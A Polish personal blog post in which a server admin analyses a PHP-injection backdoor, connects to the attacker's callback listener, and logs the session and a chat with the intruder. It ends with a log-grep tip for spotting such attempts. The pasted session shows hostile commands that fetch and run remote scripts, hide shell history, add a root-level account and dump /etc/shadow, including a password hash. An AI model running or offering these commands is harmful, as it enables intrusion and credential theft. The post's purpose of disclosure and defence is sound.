Lemat, strona prywatna

Pogadanka z hackerem xeQt

Niestety ja należę to tych zboczonych adminów, co przeglądają regularnie logi systemowe. Ostatnio wykryłem, że jakiś gostek usiłuje mi zrobić PHP injection i jest w tym dosyć upierdliwy. Jak wiadomo PHP injection polega na wykonaniu zdalnego kodu PHP przez niezabezpieczone skrypty. Ściągnąlem sobie ten zdalny kod PHP i zacząłem go analizować. Wnioski z tego były następujące:

  1. skrypt łączy się do serwera w niemczech (217.115.144.184) na port  9991 i zostawia info "kolejny frajer zhackowany", następnie oczekuje na komendy i je uruchamia
  2. ustanawia połączenie z serwerem IRC, podłącza do kanału i oczekuje na różne polecenia (komendy shela, flood, spam, ddos etc.)
  3. ściąga dodatkowe "moduły" na przykład robiące serwer proxy

Połączyłem się zatem do tego serwera w niemczech, wysłałem stosowny komunikat i czekałem co się stanie. Jednocześnie wskoczyłem na kanał IRC irc://undernet/hackphreak, gdzie aktualnie siedział hacker (google są niezłe). Poniżej zapis "rozmowy" (to co ja pisałem jest podkreślone):


# telnet 217.115.144.184 9991
Trying 217.115.144.184...
Connected to ds217-115-144-184.dedicated.hosteurope.de (217.115.144.184).
Escape character is '^]'.
[+] Conectback by xeQt...

[x] Systeminfo
Linux athlon.lemat.priv.pl 2.6.12-27mdk-i686-up-4GB #1 \
Tue Sep 26 12:41:29 MDT 2006 i686 AMD Athlon(tm) Processor unknown GNU/Linux [x] Uptime 14:30:45 up 43 days, 21 min, 1 user, load average: 0.06, 0.04, 0.01 [x] Userinfo uid=0(root) gid=0(root) grupy=0(root) [x] Dir /var/www/html
wget http://members.lycos.co.uk/mrx25/vx8s.txt;perl vx8s.txt;rm -rf vx8s.txt id id uid=0(root) gid=0(root) grupy=0(root) uid=0(root) gid=0(root) grupy=0(root) unset HISTFILE;wget http://members.lycos.co.uk/mrx25/mrx.tgz;tar xzvf mrx.tgz;\
rm -rf mrx.tgz;mv mrx .mrx;cd .mrx;chmod +x *;./setup marius14115 65501 id uid=0(root) gid=0(root) grupy=0(root) wget curl id uptime uid=0(root) gid=0(root) grupy=0(root) 14:38:34 up 43 days, 29 min, 2 users, load average: 0.02, 0.04, 0.00 who wget http://members.lycos.co.uk/mrx25/mrx.tgz;tar xzvf mrx.tgz;rm -rf mrx.tgz;\
mv mrx .mrx;cd .mrx;chmod +x *;./setup marius14115 65501 root pts/0 Feb 13 14:28 (new586.lemat.priv.pl) root pts/1 Feb 13 14:35 (new586.lemat.priv.pl) useradd -g 0 -u 0 -o xeqt;passwd xeqt id uid=0(root) gid=0(root) grupy=0(root) cat /etc/shadow root:$1$oC7iy.OK$OJx9jvBR/FudMXivODqFp/:13483:0:99999:7::: bin:*:13189:0:99999:7::: daemon:*:13189:0:99999:7::: adm:*:13189:0:99999:7::: lp:*:13189:0:99999:7::: sync:*:13189:0:99999:7::: shutdown:*:13189:0:99999:7::: halt:*:13189:0:99999:7::: mail:*:13189:0:99999:7::: news:*:13189:0:99999:7::: uucp:*:13189:0:99999:7::: operator:*:13189:0:99999:7::: games:*:13189:0:99999:7::: nobody:*:13189:0:99999:7::: rpm:!!:13189:::::: vcsa:!!:13189:::::: messagebus:!!:13189:::::: sshd:!!:13189:::::: ftp:!!:13189:::::: xfs:!!:13189:::::: mysql:!!:13189:::::: apache:!!:13190:0:99999:7::: postfix:!!:13190:0:99999:7::: amavis:!!:13190:0:99999:7::: named:!!:13191:0:99999:7::: postgrey:!!:13191:0:99999:7::: rbldns:!!:13436:::::: curl -O http://members.lycos.co.uk/mrx25/vx8s.txt;perl vx8s.txt;rm -rf vx8s.txt curl -O http://members.lycos.co.uk/mrx25/vx8s.txt;perl vx8s.txt;rm -rf vx8s.txt id uid=0(root) gid=0(root) grupy=0(root) /usr/sbin/useradd -g 0 -u 0 -o xeqt;passwd xeqt id uid=0(root) gid=0(root) grupy=0(root) wget GET gertch fetch id id;uname -a;uptime uptime




W tym momencie zostałem zauważony na IRCu hi xeQt id uid=0(root) gid=0(root) grupy=0(root) ps ax 25766 pts/0 S+ 0:00 telnet 217.115.144.184 9991 id uid=0(root) gid=0(root) grupy=0(root) id uid=0(root) gid=0(root) grupy=0(root)





A w tym momencie zdecydował się pogadać ze mną poza IRCem -
zaczeliśmy omawiać dosyć "prywatne" sprawy



hello hi xeQt gonna get me? nope, I'm not fed (nie jestem z FBI, przyp. lemat)
why dont u kill it? My hands are shaking of laugh and I cannot type process id...
its useless call em but good luck heh' so? you called feds`? not yet ill play some poker while i wait good luck dont need it, im alwise goood take peoples money and root's ehh e good luck to your opponents then yea, they need it one more thing: what's the purpose of gathering botnet?
you goto update your kernel, its vulnable its big money here not bots fuck that you gonna sell it?
who need to work when you get 2000$ everyday nop your info but you have nothing i can use and its slower than 5mb/s download so its useless to me its business, dont take it personal I dont quite understand, why my personal info is so valuable? ifconfig | grep inet | grep -v 127.0.0.1 | wc -l | sed 's/ //g' ill ignore ytour ips were both from europs so ill be nice to you I have 3 interfaces if you want to know i know:) no, you don't ;) I dont quite understand, why my personal info is so valuable? its not you have nothing i can use ok "others info" and your root is not useful to me money $$$$$$$$ 10.000$ a month its not good? it is it is thats why i dont need no once root just info bots, ddos and all that shit, its useless i dont flood or spam info is usefull to me and others like name, phone number, visa number? visa, paypal, bank logins i dont call people phone is not nigerians phone people
im a bitch, but thats the way it is, just secure your shit, and its no problem I have to go, a friendly message from me: hide yourself better, if I tracked \
you, betters will do it also
hehe Bye kill this term chao

Chcecie też sobie pogadać?

cut -d" " -f7  access_log|grep "http://"
(log apacza typu combined)

Wyświetli listę skryptów typu PHP injection, które były ostatnio "testowane" na Waszym serwerze. Trzeba taki skrypt ściągnąć i przeanalizować. Oczywiście nie radzę wykonywać.


Data utworzenia : 2007-02-15

Skomentuj ten tekst

Komentarze:

zlyZwierz
2007-09-16 21:13:18
Nawet sporo tego.
Też od jakiegoś czasu przeglądam access_log , złe ipki od razu dodaję do ipseta ;] Thx za info.
Określ swój stopień zaawansowania w PHP.
Protected by spf
[Nospam-PL.NET]
Seti@Home
www.php.net
© Lemat 2004 - ∞
Cookie Bullshit
Mapa strony
engine: lem.. at lemat·priv·pl